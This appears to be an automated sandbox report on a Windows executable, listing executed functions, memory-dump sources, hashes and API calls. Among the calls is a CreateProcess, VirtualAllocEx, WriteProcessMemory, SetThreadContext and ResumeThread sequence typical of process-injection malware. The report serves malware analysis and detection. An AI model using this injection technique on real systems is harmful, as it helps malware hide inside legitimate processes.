Instruction Fuzzy Hash: 14C0123150030947D515FB75ED45925332E77C0600F405D50B5090B61DEF7C5A444792

Analysis Process: WYqxTmjfOgdZ.exePID: 5512, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	183
Total number of Limit Nodes:	12

Executed Functions

Function 05CFDE98 Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1560407844.0000000005CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5cf0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6c76c7925c08287f63aedf23dbb04b6ba7fd5a6aa47b4babe0810cb810d85b
Instruction ID: 7e4a8c2d8e6664fb1087a8c8ef77c4dbf0280197bbccf0f102b3901ae24a372f
Opcode Fuzzy Hash: bf6c76c7925c08287f63aedf23dbb04b6ba7fd5a6aa47b4babe0810cb810d85b
Instruction Fuzzy Hash: 72E1C834A04306DFDB94CF6AD444AAE7BB6BF85300B158869D506EB361DB31ED41CB91

Function 0A650448 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1562426032.000000000A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_a650000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfd0afe28fc1985f53809d5052459b5761a0984eeeb42ea7684f6a875614f4db
Instruction ID: 547f710a2e112a43c1e25affea619d54b3ed45a8564502ca0ef3a2719794d857
Opcode Fuzzy Hash: bfd0afe28fc1985f53809d5052459b5761a0984eeeb42ea7684f6a875614f4db
Instruction Fuzzy Hash: 91C19A71B016048FDB29EFB5C460B6EB7FAAF88700F15846ED9469B791CB39E801CB51

Function 05F4CA3C Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05F4CC7E

Memory Dump Source

Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 337f1e52405b5083c24500978236735c88b54f8b535f029be9a78ebdc0832439
Instruction ID: 73b053ec4dc2c2e962330624c1dd8c43912446160ce0a7d89a4d44ae2f4b714c
Opcode Fuzzy Hash: 337f1e52405b5083c24500978236735c88b54f8b535f029be9a78ebdc0832439
Instruction Fuzzy Hash: BDA17C71D01319DFEB10DFA8C841BEEBBB2BF44710F0481AAD859A7240DB789985CF91

Function 05F4CA48 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05F4CC7E

Memory Dump Source

Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4b6717220405eeefca069d4ff050977c6914a51386ef2cb9866f3d4e8e6e6d81
Instruction ID: 4a95853998eaa7cb4861eaa22c41562169906f18a4b9a0268d5baf67888c4824
Opcode Fuzzy Hash: 4b6717220405eeefca069d4ff050977c6914a51386ef2cb9866f3d4e8e6e6d81
Instruction Fuzzy Hash: C2917C71D01319DFEB10DFA8C841BEEBBB2BF48710F1481A9D819A7240DB789985CF91

Function 00E444D4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00E459A9

Memory Dump Source

Source File: 0000000C.00000002.1545982477.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_e40000_WYqxTmjfOgdZ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8f104ad7a730f853ad148978642b506b4650bd0f671bd93a729affbb6ed63b41
Instruction ID: 2687ea493f0af0ba82bace8695ee033a43de7e0bdaefd9096f42da6a18689af1
Opcode Fuzzy Hash: 8f104ad7a730f853ad148978642b506b4650bd0f671bd93a729affbb6ed63b41
Instruction Fuzzy Hash: 8F41CFB1C00719CBDB24DFA9C844B9EBBF5BF88704F20816AD419AB251DB75694ACF90

Function 00E458EC Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00E459A9

Memory Dump Source

Source File: 0000000C.00000002.1545982477.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_e40000_WYqxTmjfOgdZ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b5c8816b85c64a3299978142bc7daff3d6ed69c04588d14e21bb0aa805354e3a
Instruction ID: b2d2d2f43ba1f093121a5dbcb6bb42d267c47c5c5fdca318a94cf128db56626e
Opcode Fuzzy Hash: b5c8816b85c64a3299978142bc7daff3d6ed69c04588d14e21bb0aa805354e3a
Instruction Fuzzy Hash: EE41E2B1C00719CFDB24DFA9C8847CEBBB1BF88714F20816AD419AB291DB756946CF50

Function 05F4C7B8 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05F4C850

Memory Dump Source

Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2f92606419c70f6005ff0322475559aed87e188c9e2c5b317427da5b729d68ae
Instruction ID: b185022510080328fe7b9b5de5926dcebbe6854492168f742439b8fc7182f1c7
Opcode Fuzzy Hash: 2f92606419c70f6005ff0322475559aed87e188c9e2c5b317427da5b729d68ae
Instruction Fuzzy Hash: 952115B19013499FDB10DFAAC885BDEBBF5FF48710F14842AE959A7240C7789940DFA4

Function 05F4C7C0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05F4C850

Memory Dump Source

Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e1dda9aed8c3869968240442a4cdafaf24b11558013ea6b973cbc62c27d517ba
Instruction ID: d5e9013be078fee13a11e1e68dfbfafb110e140184c7fe7a81db9f8c6761e335
Opcode Fuzzy Hash: e1dda9aed8c3869968240442a4cdafaf24b11558013ea6b973cbc62c27d517ba
Instruction Fuzzy Hash: D22115719003499FDB10DFAAC884BDEBBF5FF48310F10842AE919A7240C7789940CFA4

Function 05F4C8A8 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05F4C930

Memory Dump Source

Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 08025740c7767431d2b941b50a4f297b2b74afb5f9658d93ed1e78c58d515185
Instruction ID: 00e5e5bd832e294317fa12f37710d5b7c8be3787c8f3d790c776f159b2086783
Opcode Fuzzy Hash: 08025740c7767431d2b941b50a4f297b2b74afb5f9658d93ed1e78c58d515185
Instruction Fuzzy Hash: CB2105B1C007499FDB10DFAAC884AEEBBF5FF48320F50842AE519A7250C7799940CFA5

Function 05F4C1E9 Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05F4C26E

Memory Dump Source

Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d5e3fa8d8c392deb646adc8185daedea75d892f68eac787b931960f248fb2a36
Instruction ID: 8c3a8638abe99a6ba5fb1b1af8c81c02f92056cea81488532c2518d2d1e6945a
Opcode Fuzzy Hash: d5e3fa8d8c392deb646adc8185daedea75d892f68eac787b931960f248fb2a36
Instruction Fuzzy Hash: FF213AB1D007099FDB10DFAAC8857EEBBF5EF48714F148429D419A7240D7789945CFA4

Function 00E4DC70 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E4E5A6,?,?,?,?,?), ref: 00E4E667

Memory Dump Source

Source File: 0000000C.00000002.1545982477.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_e40000_WYqxTmjfOgdZ.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 538befbf44bca48fcb2b4775bb9886d8afbfa9a18ee51b768213b0c9b69fc31c
Instruction ID: 64730034a5942ada526cc9bf93fd4a12876c17cd4254dae142d752a9f9e59c57
Opcode Fuzzy Hash: 538befbf44bca48fcb2b4775bb9886d8afbfa9a18ee51b768213b0c9b69fc31c
Instruction Fuzzy Hash: 0521E3B59002489FDB10CFAAD884ADEBBF9FB48310F14841AE918A7350D378A940CFA5

Function 05F4C1F0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05F4C26E

Memory Dump Source

Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 06c291a1d5a3f232735c491280272267ffafdc5d4f107f94c7c931bf33086c55
Instruction ID: e71fc3d94022289cc3b4a1039d3f3ea8c2c6dcf2b59f5784c07b18a15b77d342
Opcode Fuzzy Hash: 06c291a1d5a3f232735c491280272267ffafdc5d4f107f94c7c931bf33086c55
Instruction Fuzzy Hash: 49211871D007098FDB10DFAAC8857EEBBF5EF48324F14842AD419A7240CB789945CFA5

Function 05F4C8B0 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05F4C930

Memory Dump Source

Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: cc50e2a66d6e454f6303cca71960f6a9ceee312e71fe06cfedb444cbf0fffe72
Instruction ID: 1931121d98ff031b2ef7b4e6b3fe054323fdc067dda07e81a085e8889d74e06b
Opcode Fuzzy Hash: cc50e2a66d6e454f6303cca71960f6a9ceee312e71fe06cfedb444cbf0fffe72
Instruction Fuzzy Hash: 432116B18007499FDB10DFAAC884BEEBBF5FF48320F10842AE519A7250C7799940CFA4

Function 05F4C6F8 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05F4C76E

Memory Dump Source

Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7b48837a6d45b74f4f6c7631e77beae774ad6b7f6fe7c2dc7468bc5b36f997ef
Instruction ID: 3beb790c32af13bf32f634d32bb72a6323495e276d64913d346007e5d10bc6be
Opcode Fuzzy Hash: 7b48837a6d45b74f4f6c7631e77beae774ad6b7f6fe7c2dc7468bc5b36f997ef
Instruction Fuzzy Hash: EE1114769003489FDB10DFAAC845BDFBBF5EF88724F148819E925A7250C779A940CFA1

Function 05F4C700 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05F4C76E

Memory Dump Source

Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c5db9aba19ffddeaabd401f3e30246fe9aac7fc787d3e57140ab07e4cd211693
Instruction ID: 569ba58a1a6f9585b0d8a9986a6b9fa5ad80130a346c5a13facb967eddeac7b3
Opcode Fuzzy Hash: c5db9aba19ffddeaabd401f3e30246fe9aac7fc787d3e57140ab07e4cd211693
Instruction Fuzzy Hash: 9B1114758002489FDB10DFAAC844BDFBBF5EF88720F148819E525A7250C779A940CFA0

Function 05F4BD00 Relevance: 1.6, APIs: 1, Instructions: 52
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 05F4BD6A

Memory Dump Source

Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d488d183ce6aa02050130a5938e4b93115c2f601948c8e3f467c5e0864ad3779
Instruction ID: 1557812f72790c2918ed2c7b78288d08a49c2ac0a79603138b507823fd0e2fb0
Opcode Fuzzy Hash: d488d183ce6aa02050130a5938e4b93115c2f601948c8e3f467c5e0864ad3779
Instruction Fuzzy Hash: 5E1116B19007488BDB20DFAAC8457DEFBF5EF88624F14841AD469A7750CB79A540CFA4

Function 05F4BD08 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 05F4BD6A

Memory Dump Source

Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 471584baa4bce645d0d55498c81c0fba1720786466560484da7cbbcf62c90c3a
Instruction ID: ac0259ba5e0c54e83b5886d6bf1ef023b0083a41c5de3022d4045c525676ce3d
Opcode Fuzzy Hash: 471584baa4bce645d0d55498c81c0fba1720786466560484da7cbbcf62c90c3a
Instruction Fuzzy Hash: EC1128B1D007488FDB20DFAAC4447DEFBF5EF88620F14841AD419A7250CB79A540CFA4

Function 05F4F690 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 05F4F6F5

Memory Dump Source

Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 3a87c5a6178b5c21be3f2b1a4182e73a591aaacf9605477b9f6f58fd4920aa78
Instruction ID: 410d9d1ff88e99dea2781a259a79a07c9f3977f4868fcc6ddd59458c504fb86c
Opcode Fuzzy Hash: 3a87c5a6178b5c21be3f2b1a4182e73a591aaacf9605477b9f6f58fd4920aa78
Instruction Fuzzy Hash: 4B11C2B58003499FDB10DF9AD885BDEBFF8FB48720F10841AE569A7610C379A544CFA5

Function 05F49398 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 05F4F6F5

Memory Dump Source

Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d20d82d323c8159d6c53fdc848af0f3276f8e13e0b92672f939021d9d0377389
Instruction ID: c9325d7eee1d7c252bc2469c87d53dc1f234059026fc506fa13b59b7434e160b
Opcode Fuzzy Hash: d20d82d323c8159d6c53fdc848af0f3276f8e13e0b92672f939021d9d0377389
Instruction Fuzzy Hash: A111F2B58003489FDB20DF9AC885BDEBBF8EB48324F10841AE518A7310C379A944CFA5

Function 00E4C300 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E4C366

Memory Dump Source

Source File: 0000000C.00000002.1545982477.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_e40000_WYqxTmjfOgdZ.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8085f897066422890cc9aa6edd6590ff4d2d1e928caa84d83a8bc83bb2495e36
Instruction ID: 31865edf4ff2df15d987b5f8023a0821d70c7801e36a2570978389a5858e5d47
Opcode Fuzzy Hash: 8085f897066422890cc9aa6edd6590ff4d2d1e928caa84d83a8bc83bb2495e36
Instruction Fuzzy Hash: A3110FB5C007498FCB20DF9AD444ADEFBF4AB88724F20845AD428B7210C379A545CFA5

Function 05CFE588 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

6, xrefs: 05CFE59C

Memory Dump Source

Source File: 0000000C.00000002.1560407844.0000000005CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5cf0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-498629140
Opcode ID: 7ae2ed26426755a9faa5c25b5b9d06ced4ddd84543a5292aa74b2210d4656568
Instruction ID: 2f90ec2e7c9a1c25afb4dc8c731203a5ed1fa8124e2d23fef8ba522430e39e5d
Opcode Fuzzy Hash: 7ae2ed26426755a9faa5c25b5b9d06ced4ddd84543a5292aa74b2210d4656568
Instruction Fuzzy Hash: 75E0C270904308EBCBA4EFB4D5096ADBBBDE70A301F10489AD40693790FB314A46CB45

Function 05CF72C8 Relevance: .7, Instructions: 748COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1560407844.0000000005CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5cf0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 452e1ceaa38569aa01f9dfc2ebf3fa698f8865345d2f9b1a13d2940e28f700cb
Instruction ID: 06ce124460dea1f890da05f930e5bc57569602990bedf48707cba324f9d3161c
Opcode Fuzzy Hash: 452e1ceaa38569aa01f9dfc2ebf3fa698f8865345d2f9b1a13d2940e28f700cb
Instruction Fuzzy Hash: 3362AD70F00B468BDFB4DB74C5883AE7AE1FB45304F604D5ED2AACA290DB389681DB55

Function 05CF7269 Relevance: .5, Instructions: 477COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1560407844.0000000005CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5cf0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2d49128096ee752c72f5c998fa9e3dfd2aef05f025b789fcaa8b6ddd5bd8290
Instruction ID: bef4c3f58e217b3553eaf7f7de346381279b8d46bed12e389efbbe31a294c684
Opcode Fuzzy Hash: a2d49128096ee752c72f5c998fa9e3dfd2aef05f025b789fcaa8b6ddd5bd8290
Instruction Fuzzy Hash: 122260B0A05B824ADBB4DF64C5843AE7EE0FB05314F604D9BC1FACA295DB399186CB45

Function 05CF82D8 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1560407844.0000000005CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5cf0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f86b90c1468ee5b534a294085a6fd1e44bbd5499f2140078e3a094ed1896ddb
Instruction ID: cc6efda78c2573fc8bd9e390608fb0b77925469354869e8d8865e8282f9bc172
Opcode Fuzzy Hash: 8f86b90c1468ee5b534a294085a6fd1e44bbd5499f2140078e3a094ed1896ddb
Instruction Fuzzy Hash: 69B12231B046048FEB64DB399854BBEBBE6FFC5210F14486ADA4AC7391CE349D46C7A1

Function 05CFA011 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1560407844.0000000005CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5cf0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a461cc842b0eb380976ecb9f70b5b1d5ce97ad0006546aa47b97fa9daba1d4af
Instruction ID: 70dc350b869b72f10068d43200a4305f8f679e4e495bb618dd324834249087c7
Opcode Fuzzy Hash: a461cc842b0eb380976ecb9f70b5b1d5ce97ad0006546aa47b97fa9daba1d4af
Instruction Fuzzy Hash: D5B17D30700219AFDB05DF69D854AAEBBB6FF88310F148429E90A97390DF35DD46CB95

Function 0A650860 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1562426032.000000000A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_a650000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaa2e5ea56f0df3ad52adaff72de28d64868b12289b52cf29e06ad940ec5a3cd
Instruction ID: 7e8e105179bc684e96458249c1ef1bc4b6a2146cf273f7d40487d7fa8a58f5de
Opcode Fuzzy Hash: aaa2e5ea56f0df3ad52adaff72de28d64868b12289b52cf29e06ad940ec5a3cd
Instruction Fuzzy Hash: 40A14B30B112049FDB14DBB8D554BAEB7F6EF89700F2640A9E905AB3A2CB71DD41CB51

Function 05CFEFDE Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1560407844.0000000005CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5cf0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 548ebb8e18dcf4dc0fcaa21b4136375583bef04ebb866713faea1f9e7d00d4a2
Instruction ID: 65e383dde0e233da5cf414234938767498cfcbbbd7cb6d0a4c2d2f289c1ed3c2
Opcode Fuzzy Hash: 548ebb8e18dcf4dc0fcaa21b4136375583bef04ebb866713faea1f9e7d00d4a2
Instruction Fuzzy Hash: 1291F878E042189FCB54DFA9D4806ADBBF2FF89314F20852AE915E7355DB319942CF50

Function 05CF1D50 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1560407844.0000000005CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5cf0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3add64a480a1b066e66d3691f3a7805a99b05ed164f7cf7d5172275e920fd0fd
Instruction ID: e0041b309eb99d39aa2372a3bb39cd56dff6402f0fabf5aedcdc085e1dbb15aa
Opcode Fuzzy Hash: 3add64a480a1b066e66d3691f3a7805a99b05ed164f7cf7d5172275e920fd0fd
Instruction Fuzzy Hash: AA81BE38710600CFCB44EF28D498A697BF6FF89A04B1545A9EA06CB3B5DB71ED41CB90

Function 05CF1848 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1560407844.0000000005CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5cf0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dcbdb7f0dc8cee313e5202e98c09b9251850a2105e95a3e8fcbfe86c769889d
Instruction ID: 0902fd38fc3dc3d2c4189c65e899648b3886188cf9b79a8cdd169a60420b82e3
Opcode Fuzzy Hash: 1dcbdb7f0dc8cee313e5202e98c09b9251850a2105e95a3e8fcbfe86c769889d
Instruction Fuzzy Hash: D5712A35B00208CFDB54EBA4D554AAD77F2FF88610B2544A9D941BB391CB36DD41CFA1

Function 05CF9898 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1560407844.0000000005CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5cf0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9450cbee6515d9f39554d525c035f35b4445aa612f19255c83669dc9dd1d846
Instruction ID: 1206bca44137a6175c2239b48fe9da6fddd3748962ed13b4f16ffaef7e2739c7
Opcode Fuzzy Hash: f9450cbee6515d9f39554d525c035f35b4445aa612f19255c83669dc9dd1d846
Instruction Fuzzy Hash: FF615C31B002099FDF54DF69D858BEDBBB6FB88A11F144829EA06A7350DB31DD41CBA0

Function 05CF36C0 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1560407844.0000000005CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5cf0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80b94efd54ab85d5cb1fb7d56324c796328d90be8e6f0b61c9542c32edda2cea
Instruction ID: 570f23b3c653ffdaebce26c64563c401ec8e6383bd64532deedfc358e3c07b08
Opcode Fuzzy Hash: 80b94efd54ab85d5cb1fb7d56324c796328d90be8e6f0b61c9542c32edda2cea
Instruction Fuzzy Hash: E4518130A00249DFDB54EF78E8596ADBBB2EF84600F14892AD506A7390DF789986CB51

Function 05CF3D08 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1560407844.0000000005CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5cf0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e99d854f2555f6c0b250c3c643bc87003083918988467b93af4e5afaefd65d4
Instruction ID: 5b04c21acf33ccdd23372857d41f38c7da2e53966e83b1823f0e1be83f2afa53
Opcode Fuzzy Hash: 2e99d854f2555f6c0b250c3c643bc87003083918988467b93af4e5afaefd65d4
Instruction Fuzzy Hash: 36718E74A01248AFCB54DF69D888DAEBBB6FF48714F114898F901AB361DB31ED81CB50

Function 05CF3CF8 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

